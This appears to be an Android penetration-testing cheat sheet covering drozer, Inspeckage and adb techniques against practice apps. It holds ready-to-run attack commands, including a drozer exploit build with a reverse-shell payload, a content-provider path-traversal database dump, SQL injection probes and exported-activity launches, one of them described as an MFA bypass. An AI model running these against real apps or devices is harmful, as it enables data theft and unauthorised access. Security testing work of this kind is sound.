gitclonehttps://github.com/FSecureLABS/drozer.gitcddrozermakedeb# or :wgethttps://github.com/WithSecureLabs/drozer/releases/download/2.4.4/drozer_2.4.4.debdpkg-idrozer_2.4.4.deb# install drozer agent on devicewgethttps://github.com/mwrlabs/drozer/releases/download/2.3.4/drozer-agent-2.3.4.apkadbinstalldrozer-agent-2.3.4.apk# open drozer agent app on device : turn it "on"adbforwardtcp:31415tcp:31415drozerconsoleconnect
Commands
# on drozer consoledrozerconsoleconnect'''Info Gathering / Basics'''# list moduleslist# get packages listrunapp.package.list-f $filter# get basic info of packagerunapp.package.info-a $package_app# view copied text via clipboardrunpost.capture.clipboard# dump androidmanifest.xml filerunapp.package.manifest $package_app# identify weaknessesrunapp.package.attacksurface $package_app# list exported activities / find private activitiesrunapp.activity.info-a $package_app# find browsable activitiesrunscanner.activity.browsable# finding if app allows its data to be backed uprunapp.package.backup-f $package_app# bypass exported activity# launch activityrunapp.activity.start--component $package_app $package_app.$activity'''WebView'''# find if webview is exploitablerunscanner.misc.checkjavascriptbridge-a $package_app'''Content providers'''# get infos about content providersrunapp.provider.info-a $package_app# content provider vulnerabilitiesrunscanner.provider.injection-a $package_apprunscanner.provider.traversal-a $package_app# Database-backed Content Providers (Data Leakage)runscanner.provider.finduris-a $package_app# query accessible content URIsrunapp.provider.querycontent://$content# Database-backed Content Providers (SQLi)runapp.provider.querycontent://$accessible_content--projection"'"runapp.provider.querycontent://$accessible_content--selection"'"'''Services'''# list servicerunapp.service.info-a $package_app# interact with service# app.service.send # app.service.start # Start Service # app.service.stop # Stop Servicerun app.service.send $package_app $ $package_app.$service --msg 2354 9234 1 --extra string $package_app.PIN 1337 --bundle-as-obj
'''Broadcast Receivers'''# broadcast receiversrunapp.broadcast.info# Detects all broadcast receivers on device# check for apprunapp.broadcast.info-a $package_app# interactions# app.broadcast.info Get information about broadcast receivers # app.broadcast.send Send broadcast using an intent # app.broadcast.sniff Register a broadcast receiver that can sniff particular intents# i.e. : send SMS on apprun app.broadcast.send --action org.owasp.goatdroid.fourgoats.SOCIAL_SMS --component org.owasp.goatdroid.fourgoats.broadcastreceivers SendSMSNowReceiver --extra string phoneNumber 123456789 --extra string message "Hello mate!"
'''Debug'''# find debuggable appsrunapp.package.debuggable# You can run commands as that app if it is debuggableshell@android:/ $ run-as $package_app'''Exploits / Shellcode'''# on host terminaldrozerexploitlistdrozershellcodelist# example : CVE-2010-1807drozerexploitbuildexploit.remote.webkit.nanparseβ-payloadweasel.reverse_tcp.armeabi--server10.0.2.2:31415--push-server127.0.0.1:31415--resource/home.html
PID Cat
Tool showing log entries for a specific application package when debug=true in the application.
Exported and Non-exported Activities, Content Providers,Broadcast Receivers and Services;
Check if the app is debuggable or not;
Version, UID and GIDs;
HooksWith the hooks, we can see what the application is doing in real time:
Shared Preferences (log and file);
Serialization;
Crypto;
Hashes;
SQLite;
HTTP (an HTTP proxy tool is still the best alternative);
File System;
Miscellaneous (Clipboard, URL.Parse());
WebView;
IPC.
adbinstallmobi.acpm.inspeckage.apk# go to the device : launch inspeckage# open web browser : http://127.0.0.1:8008 on mobile
Manual
Exported Activities / Service
One time, I used an exported activity as a very good way to bypass the MFA on an app βΊοΈ
In AndroidManifest.xml, check for exported activities :
catAndroidManifest.xml|grep'exported="true"'# true : activity can be launched by any other applications.# false : only the application can launch it.# launch exported activityadbshellamstart-n $package_name/.$activity# or drozer
Exploit Service (1)
When a service is exported without any permission restriction, any application can bind to the service and access the function implemented in the service.
dz> run app.service.send com.mwr.example.sieve com.mwr.example.sieve.CryptoService --msg 3452 2 3 --extra string com.mwr.example.sieve.KEY testpassword --extra string com.mwr.example.sieve.STRING "string to be encrypted" --bundle-as-obj
The parameters passed in --msg are extra parameters. Analyze code and use the parameters mentioned there, and add extra till 3 parameters are completed. --msg expects three parameters.
Vulnerable Content Provider
A content provider component supplies data from one application to others on request. Such requests are handled by the methods of the ContentResolver class. A content provider can use different ways to store its data and the data can be stored in a database, in files, or even over a network.
catAndroidManifest.xml|grep"<provider"# search for :# android:enabled="true"# android:exported="true"# check the permissions# drozer consolerunapp.provider.info-a $package_app# check source code for content providers URI# query it :runapp.provider.query $content_provider_URI --vertical
SQLi's
SQLi on Content provider connected to DB using projection parameter
dz> run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/../../../../data/data/com.mwr.example.sieve/databases/database.db >database.db
Sensitive information, (usernames, passwords, and other user data), is stored or printed in an insecure manner. This means that this information is easily accessible to anyone with access to the logs, which could potentially be a malicious actor who gains access to the device.
# make sure you installed frida# find pid of appfrida-ps-Uai# get logs of the app :adblogcat--pid=2244# or without frida : adblogcat|grep"$(adbshellps|grep $app_name |awk '{print $2}')"# find logged infos by the app when you log in, etcadblogcat--pid=2244|grep"password"
Input Validation Issues
Input data from users, such as login credentials, user input, and other user-generated data, is not properly validated before being used by the application. Check for :
SQLi
XSS
Code Injection
BOF
File Inclusion
etc.
Access Control Issues
Access controls, such as authentication and authorization mechanisms, are not properly implemented or enforced. This can lead to unauthorized access to sensitive information, data theft, and other security breaches.
Try to access "sensitive" activities from outside the app :
# list activities with adbadbshelldumpsyspackage|grep-i' + package.name + '|grepActivity# use adbadbshellamstart-n $app_name/.$activity# Letβs try to access activity using content provider.adbshellcontentquery--uricontent://jakhar.aseem.diva.provider.notesprovider/notes/adbshellamstart-ncom.android.insecurebankv2/com.android.insecurebankv2.PostLogin
Deep links are basically hyperlinks that allow users to directly open specific views inside an android application. Examine the AndroidManifest.xml file and search for android:scheme attributes inside <data> tags to find the deep link defined.
catAndroidManifest.xml|grep"<data"# locate scheme, host and pathPrefix# queryadbshellamstart-aandroid.intent.action.VIEW-d"scheme://hostname/path?param=value" $package_name
WebView Attacks
WebView is a view that allows an application to load web pages within it. Internally it uses web rendering engines such as Webkit. The Webkit rendering engine was used prior to Android version 4.4 to load these web pages. On the latest versions (after 4.4) of Android, it is done using Chromium. When an application uses a WebView, it is run within the context of the application, which has loaded the WebView. To load external web pages from the Internet, the application requires INTERNET permission in its AndroidManifest.xml file:
Accessing sensitive local resources through file scheme When an Android application uses a WebView with user controlled input values to load web pages, it is possible that users can also read files from the device in the context of the target application.
Insecure Broadcast Receiver
BroadcastReceiver is an android component that listens to system-wide broadcast events or intents. Examples of these broadcasts are when your phoneβs battery is running low then a broadcast indicating the low battery condition is sent. Some apps could be configured to listen for this broadcast and lower its power consumption and maybe lower the brightness on your screen, etcβ¦
How to Exploit
Examine AndroidManifest.xml
Check for <receiver> tags
Check in the code where the broadcast receiver is, for the onReceivefunction and see how it handles broadcasts it receives.
Try to exploit it by sending customized notification
If an app expects a broadcast receiver to catch an intent and then show authenticated activities, generation of that broadcast is only possible after login. But after code review, an attacker can manually send that intent using drozer. Sample broadcast receiver:
